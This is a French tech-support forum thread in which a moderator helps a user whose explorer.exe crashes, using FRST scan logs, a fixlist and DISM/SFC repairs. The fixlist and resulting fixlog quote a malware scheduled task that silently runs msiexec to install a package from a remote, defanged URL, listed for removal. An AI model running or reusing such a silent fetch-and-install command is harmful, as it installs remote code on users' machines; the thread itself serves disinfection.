Explorer.exe s'ouvre et se referme...

Résolu/Fermé
M3F0 Messages postés 5 Date d'inscription samedi 29 juillet 2017 Statut Membre Dernière intervention 29 juillet 2017 - 29 juil. 2017 à 18:39
M3F0 Messages postés 5 Date d'inscription samedi 29 juillet 2017 Statut Membre Dernière intervention 29 juillet 2017 - 29 juil. 2017 à 20:23
Bonjour cela fait quelques mois que j'ai un problème avec mon explorer.exe:
Quand je démarre ma session il y a quelques fois un écran noir et pas d'explorer (pas de barre des tâches, ni bureau, rien). Parfois quand je le démarre il s'affiche, il plante et il se ferme et l'explorer ne marche plus... J'ai essayé toutes les solutions que des personnes proposé, en vain... J'ai utilisé pleins d'anti-malware, pour tout désinfectiner et je n'ai aucun résultat par la suite... Avez-vous d'autres solutions s'il vous plaît ? Merci beaucoup

3 réponses

quentin2121 Messages postés 8985 Date d'inscription lundi 24 mai 2010 Statut Membre Dernière intervention 17 décembre 2024 Ambassadeur 1 247
29 juil. 2017 à 18:52
sfc /scannow à taper en invite de commande pour réparer windows
0
M3F0 Messages postés 5 Date d'inscription samedi 29 juillet 2017 Statut Membre Dernière intervention 29 juillet 2017
29 juil. 2017 à 19:04
Merci de ta réponse, J'ai un message suite à cette commande: La protection des ressources Windows n'a pas réussi à démarrer le service de réparation. :/
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
29 juil. 2017 à 18:56
Salut,

Commence par ceci :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

0
M3F0 Messages postés 5 Date d'inscription samedi 29 juillet 2017 Statut Membre Dernière intervention 29 juillet 2017
29 juil. 2017 à 19:29
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
Modifié le 29 juil. 2017 à 19:39
SearchProtocolHost.exe fait que de planter...

Error: (07/29/2017 07:05:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante SearchProtocolHost.exe, version : 7.0.9600.18722, horodatage : 0x593156e3
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0xc0000005
Décalage d’erreur : 0x0000000000000000
ID du processus défaillant : 0x10a4
Heure de début de l’application défaillante : 0x01d3089553b7e7e4
Chemin d’accès de l’application défaillante : C:\Windows\system32\SearchProtocolHost.exe
Chemin d’accès du module défaillant: unknown
ID de rapport : 91687aa8-7488-11e7-8464-80a58947f4a4
Nom complet du package défaillant :
ID de l’application relative au package défaillant :


Ensuite tu télécharges un peu tout et n'importe quoi
à un moment tu as téléchargé un crack vérolé.

Désinstalle WildTangent Games, si tu ne t'en sers pas.

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
Task: {C6EE40A0-943F-43CB-AF2C-9291C8833E97} - System32\Tasks\Ezurgyua => C:\PROGRA~1\JUKMIS~1\Ogaocfu.bat <==== ATTENTION
Task: {AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} - System32\Tasks\Coecapyzirucult => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=TOSHIBAXDT01ACA100_95J23XZNSXX95J23XZNSX&v=2017214 /q <==== ATTENTION
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
2017-07-29 17:34 - 2017-07-29 17:34 - 00000000 ____D C:\Users\Monsieur\AppData\Local\Apps\2.0
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

~~

Commence par lancer une Réparation DISM

Clique-droit sur le menu "Démarrer" puis "Invites de commandes (admin)" ou par une recherche Cortana :
https://www.malekal.com/wp-content/uploads/ouvrir-invite-commandes-administrateur-Windows10.gif

Saisir DISM /Online /Cleanup-image /Restorehealth dans la fenêtre.

(attention, il y a un espace devant chaque commande commençant par / /Online /Cleanup-image etc)

Redémarre.

Tu peux lancer une Réparation SFC

Clique-droit sur le menu "Démarrer" puis "Invites de commandes (admin)",
Saisir sfc /scannow dans la fenêtre.

Ça doit te dire que la protection a détecté des éléments endommagés,
qu'il faut redémarrer pour pouvoir les corriger. A ce moment, redémarre.

~~

Si pas mieux :
- créé un nouvel utilisateur Windows, vois ce que cela donne dessus
- test en désinstallant Avast et Malwarebytes.

Veuillez appuyer sur une touche pour continuer la désinfection...
0
M3F0 Messages postés 5 Date d'inscription samedi 29 juillet 2017 Statut Membre Dernière intervention 29 juillet 2017
29 juil. 2017 à 20:20
Contenu du fichier fixlog.txt:


Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 29-07-2017
Exécuté par Monsieur (29-07-2017 20:08:40) Run:1
Exécuté depuis C:\Users\Monsieur\Desktop\LEUCATE
Profils chargés: Monsieur (Profils disponibles: Monsieur & vays_000)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

CreateRestorePoint:
CloseProcesses:
Task: {C6EE40A0-943F-43CB-AF2C-9291C8833E97} - System32\Tasks\Ezurgyua => C:\PROGRA~1\JUKMIS~1\Ogaocfu.bat <==== ATTENTION
Task: {AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} - System32\Tasks\Coecapyzirucult => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=TOSHIBAXDT01ACA100_95J23XZNSXX95J23XZNSX&v=2017214 /q <==== ATTENTION
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
2017-07-29 17:34 - 2017-07-29 17:34 - 00000000 ____D C:\Users\Monsieur\AppData\Local\Apps\2.0
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6EE40A0-943F-43CB-AF2C-9291C8833E97} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6EE40A0-943F-43CB-AF2C-9291C8833E97} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Ezurgyua => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ezurgyua => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Coecapyzirucult => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Coecapyzirucult => clé supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Monitoring => valeur supprimé(es) avec succès
C:\Users\Monsieur\AppData\Local\Apps\2.0 => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 139050237 B
Java, Flash, Steam htmlcache => 170225894 B
Windows/system/drivers => 754867 B
Edge => 0 B
Chrome => 237962748 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 248631 B
systemprofile32 => 0 B
LocalService => 13042 B
NetworkService => 128 B
Monsieur => 69176136 B
vays_000 => 0 B
vays_000.GAMERER => 179347896 B

RecycleBin => 777592 B
EmptyTemp: => 760.6 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 20:09:42

0
M3F0 Messages postés 5 Date d'inscription samedi 29 juillet 2017 Statut Membre Dernière intervention 29 juillet 2017
Modifié le 29 juil. 2017 à 20:26
:/
0